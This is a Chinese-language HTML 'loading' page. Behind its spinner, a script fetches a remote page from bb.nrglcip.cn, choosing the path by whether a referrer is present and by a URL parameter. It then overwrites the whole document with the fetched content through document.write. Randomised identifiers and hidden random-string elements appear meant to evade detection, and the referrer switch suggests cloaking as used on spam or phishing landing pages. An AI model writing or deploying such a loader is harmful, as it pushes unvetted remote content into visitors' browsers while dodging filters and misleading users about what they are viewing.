<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qKqFhUO {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qKqFhUO .kpa5nPd70 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qKqFhUO .content {
            line-height: 50px;
            text-align: center
        }

        .qKqFhUO .img {
            width: 100%
        }

        .qKqFhUO .FeYoiQ0lX {
            text-align: center
        }

        .qKqFhUO .FeYoiQ0lX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qKqFhUO .FeYoiQ0lX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qKqFhUO .FeYoiQ0lX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qKqFhUO .FeYoiQ0lX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qKqFhUO .FeYoiQ0lX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qKqFhUO .FeYoiQ0lX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qKqFhUO .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Bf4ng09iUW5V(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var tNnZJI3 = Bf4ng09iUW5V('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ tNnZJI3 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ tNnZJI3 +".html?a=share";
		}
		
        Wid5LbFDSG=url+"#"+new Date().getTime();
        Wid5LbFDSG && function() {
            $.get(Wid5LbFDSG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >XqFDsmMHRPiMfXhLjVmU79kygQmOJTcO3LrYz</b>
<a  href='#' style='display:none'>gTr1X5knGxNC8z3xO1phpEVTsl8V2EH8lNF5onTz4IhPNKKFSHktrP</a>
<a  href='#' style='display:none'>gTr1X5knGxNC8z3xO1phpEVTsl8V2EH8lNF5onTz4IhPNKKFSHktrP</a>
<img  src='' style='display:none'>
<ul style='display:none' >NUq2xoltpgx93Vf6BNta2NvoMH8kR9k3X3G9nRm9noP5</ul>
<h1 style='display:none' >jJ98Iv44j2vY6oDK5G6PCV</h1>
<div style='display:none'>IlEKar3oYuHFNZEIopFRLPalNAuxJFPpw4EDm5VWRjlLgr20D94QzzPT1bHccAspisvCrNieKXhBJ</div>
<h1 style='display:none' >jJ98Iv44j2vY6oDK5G6PCV</h1>
<b style='display:none' >XqFDsmMHRPiMfXhLjVmU79kygQmOJTcO3LrYz</b><div class="qKqFhUO">
    <div class="kpa5nPd70">
        <div class="FeYoiQ0lX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >YZzqiWT90ZwyNpzET95evI6GmkCpLRKn5oQeKq7Q8b5GU2XRAlDnWDcULBdQWkkKZ9llHsmBjQfFOdy50</b>
<ul style='display:none' >e60ZuafW0LD</ul>
<a  href='#' style='display:none'>Gjz93fpLCDIU8n526C2zAX</a>
<ul style='display:none' >e60ZuafW0LD</ul>
<a  href='#' style='display:none'>Gjz93fpLCDIU8n526C2zAX</a>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>Gjz93fpLCDIU8n526C2zAX</a>
<a  href='#' style='display:none'>Gjz93fpLCDIU8n526C2zAX</a>
<h1 style='display:none' >ocGFS0c74affr20NM7CLQAe9AGgZVJRHJ4JkLCyLy6EYcPMfcuJ8GAEThEYR9M7Rhm5bReGxoyOPg</h1></body>
</html>